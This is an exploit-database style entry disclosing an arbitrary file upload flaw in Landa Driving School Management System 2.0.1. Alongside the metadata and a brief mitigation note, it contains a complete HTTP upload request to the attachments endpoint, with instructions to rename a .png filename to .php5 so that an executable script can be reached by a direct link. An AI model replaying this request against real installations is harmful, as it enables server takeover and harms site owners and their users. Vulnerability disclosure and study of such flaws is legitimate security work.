Landa Driving School Management System 2.0.1 - Arbitrary File Upload

vendor:

Landa Driving School Management System

by:

Sohel Yousef

7.5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Landa Driving School Management System

Affected Version From: 2.0.1

Affected Version To: 2.0.1

Patch Exists: NO

Related CWE:

CPE: a:landa_driving_school_management_system:2.0.1

Metasploit:

Other Scripts:

Platforms Tested:

2022

Landa Driving School Management System 2.0.1 – Arbitrary File Upload

Landa Driving School Management System version 2.0.1 allows registered users to upload arbitrary files, specifically .php5 files, in the attachments section. This can be exploited using an intercept tool in Burp Suite to edit the raw request. The uploaded files can be accessed directly via a direct link.

Mitigation:

The vendor should implement proper file type validation and restrict users from uploading executable files. Additionally, the application should sanitize user input to prevent arbitrary file uploads.

Source

Exploit-DB raw data:

# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload
# Version 2.0.1
# Google Dork: N/A
# Date: 17/01/2022
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
Landa Driving School Management System contain arbitrary file upload
registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw

details 

POST /profile/attachment/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
Content-Length: 294983
Origin: https://localhost 
Connection: close
Referer: https://localhost/profile/91/
Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="name"

sddd
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="csrf-token"

e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="userid"

91
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>>  change this to w.php5
Content-Type: image/png


you will have a direct link to the uploaded files